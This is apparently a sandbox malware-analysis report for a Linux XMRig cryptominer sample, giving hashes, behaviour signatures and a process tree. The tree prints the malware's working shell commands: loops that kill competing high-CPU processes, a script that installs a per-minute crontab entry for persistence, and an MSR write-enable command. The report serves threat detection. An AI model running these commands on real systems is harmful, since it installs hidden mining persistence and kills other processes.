Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    150s
  • max time network
    154s
  • platform
    ubuntu-20.04_amd64
  • resource
    ubuntu2004-amd64-20240221-en
  • resource tags

    arch:amd64arch:i386image:ubuntu2004-amd64-20240221-enkernel:5.4.0-169-genericlocale:en-usos:ubuntu-20.04-amd64system
  • submitted
    19/03/2024, 01:08

General

  • Target

    a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf

  • Size

    2.0MB

  • MD5

    12ffe402a6d5b35160009cfd140ceed6

  • SHA1

    7f21f863f00c9bff182c3044ea225574b02107cf

  • SHA256

    a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be

  • SHA512

    d72e41dd3b346280e3f7a6fdef0031e1203239e9e7bda96cd077c58be36dd270923708adf26090f09ad5d8db1df6b9ceed14336c1284d196ae297b096379b9b8

  • SSDEEP

    49152:Tvdem3S7FxEqg0Y4NIY4cxFrUqIR296CbO:lS5xEqgCGYxxFHe29c

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 1 IoCs
  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Checks hardware identifiers (DMI) 1 TTPs 4 IoCs

    Checks DMI information which indicate if the system is a virtual machine.

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads CPU attributes 1 TTPs 5 IoCs
  • Reads hardware information 1 TTPs 14 IoCs

    Accesses system info like serial numbers, manufacturer names etc.

  • Enumerates kernel/hardware configuration 1 TTPs 56 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 3 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
    /tmp/a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
    1⤵
    • Checks CPU configuration
    • Checks hardware identifiers (DMI)
    • Reads CPU attributes
    • Reads hardware information
    • Enumerates kernel/hardware configuration
    • Writes file to tmp directory
    PID:1474
    • /bin/sh
      sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done"
      2⤵
        PID:1476
        • /usr/bin/awk
          awk "/[zZ]/ && !a[\$2]++ {print \$2}"
          3⤵
            PID:1478
          • /usr/bin/ps
            ps -A "-ostat,ppid"
            3⤵
            • Reads CPU attributes
            • Reads runtime system information
            PID:1477
        • /bin/sh
          sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- 'kthreadds[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- 'kthreadds[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
          2⤵
            PID:1483
            • /usr/bin/id
              id -u
              3⤵
                PID:1484
              • /usr/bin/awk
                awk "{if(\$3>30.0) print \$2}"
                3⤵
                  PID:1489
                • /usr/bin/grep
                  grep -v /usr/sbin/httpd
                  3⤵
                    PID:1488
                  • /usr/bin/grep
                    grep -v -- "kthreadds[[:space:]]*\$"
                    3⤵
                      PID:1487
                    • /usr/bin/ps
                      ps aux
                      3⤵
                      • Reads CPU attributes
                      • Reads runtime system information
                      PID:1485
                    • /usr/bin/grep
                      grep -v grep
                      3⤵
                        PID:1486
                    • /bin/sh
                      sh -c "dir=`pwd 2>/dev/null`;rm -rf \$dir/.cron 2>/dev/null;crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep -v '/tmp/a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf' 2>/dev/null > .cron 2>/dev/null;echo '* * * * * '\$dir/'/tmp/a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf > /dev/null 2>&1;' >> .cron 2>/dev/null; if [ \$(crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep '/tmp/a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf\$' 2>/dev/null | sort 2>/dev/null | uniq 2>/dev/null | wc -l 2>/dev/null) -eq '0' ]; then crontab \$dir/.cron 2>/dev/null; fi;rm -rf \$dir/.cron 2>/dev/null"
                      2⤵
                      • Writes file to tmp directory
                      PID:1493
                      • /usr/bin/rm
                        rm -rf /tmp/.cron
                        3⤵
                          PID:1495
                        • /usr/bin/grep
                          grep -v /tmp/a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
                          3⤵
                            PID:1498
                          • /usr/bin/grep
                            grep -v grep
                            3⤵
                              PID:1497
                            • /usr/bin/crontab
                              crontab -l
                              3⤵
                                PID:1496
                              • /usr/bin/crontab
                                crontab /tmp/.cron
                                3⤵
                                • Creates/modifies Cron job
                                PID:1506
                              • /usr/bin/rm
                                rm -rf /tmp/.cron
                                3⤵
                                  PID:1508
                              • /bin/sh
                                sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- 'kthreadds[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- 'kthreadds[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- 'kthreadds[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- 'kthreadds[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"
                                2⤵
                                  PID:1509
                                  • /usr/bin/id
                                    id -u
                                    3⤵
                                      PID:1510
                                • /usr/bin/grep
                                  grep "/tmp/a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf\$"
                                  1⤵
                                    PID:1502
                                  • /usr/bin/sort
                                    sort
                                    1⤵
                                      PID:1503
                                    • /usr/bin/grep
                                      grep -v grep
                                      1⤵
                                        PID:1501
                                      • /usr/bin/uniq
                                        uniq
                                        1⤵
                                          PID:1504
                                        • /usr/bin/wc
                                          wc -l
                                          1⤵
                                            PID:1505
                                          • /usr/bin/crontab
                                            crontab -l
                                            1⤵
                                              PID:1500
                                            • /usr/bin/wc
                                              wc -l
                                              1⤵
                                                PID:1516
                                              • /usr/bin/awk
                                                awk "{if(\$3>30.0) print \$2}"
                                                1⤵
                                                  PID:1515
                                                • /usr/bin/grep
                                                  grep -- "kthreadds[[:space:]]*\$"
                                                  1⤵
                                                    PID:1514
                                                  • /usr/bin/grep
                                                    grep -v grep
                                                    1⤵
                                                      PID:1513
                                                    • /usr/bin/ps
                                                      ps aux
                                                      1⤵
                                                      • Reads CPU attributes
                                                      • Reads runtime system information
                                                      PID:1512
                                                    • /bin/sh
                                                      sh -c "/sbin/modprobe msr allow_writes=on > /dev/null 2>&1"
                                                      1⤵
                                                        PID:1562
                                                        • /sbin/modprobe
                                                          /sbin/modprobe msr "allow_writes=on"
                                                          2⤵
                                                          • Enumerates kernel/hardware configuration
                                                          PID:1563

                                                      Network

                                                      MITRE ATT&CK Enterprise v15

                                                      Replay Monitor

                                                      Loading Replay Monitor...

                                                      Downloads

                                                      • /tmp/.cron

                                                        Filesize

                                                        107B

                                                        MD5

                                                        7e58fd6f14d1f87d2b058d69864a8582

                                                        SHA1

                                                        45e4dfa0ebba4de5c38473ffbc8dbde7eb3bc468

                                                        SHA256

                                                        0d69efac2c18ab0bba2369b1407f6a9e870bdb2f137fd655ad4252244ae7f922

                                                        SHA512

                                                        18bc835ad1b09c31e03efeaa105e6ab1aa402cce685a13c40cad5a80fac8e3aaafd1bacdf14bf4c47d4c8944b0482cc30468f988135aa9814f036f38c0a19ce9

                                                      • /var/spool/cron/crontabs/tmp.HaGeO6

                                                        Filesize

                                                        291B

                                                        MD5

                                                        6bcb97a8c268f5f67c5e30907522f0c7

                                                        SHA1

                                                        92220f7ce62610e5573bb1db15eb360c1b658101

                                                        SHA256

                                                        72d52ced02a4ca6f3492d39400a22799828bd4e6bd50cc4f934527cbaae64d19

                                                        SHA512

                                                        11e26fe77710abd3b972a66c93f623a36608f18d77e12982901dd05621e9f6e093f48a04133cd8c6af8e9b284f13e7fe75158e856409d0eef91eee12fa8e331d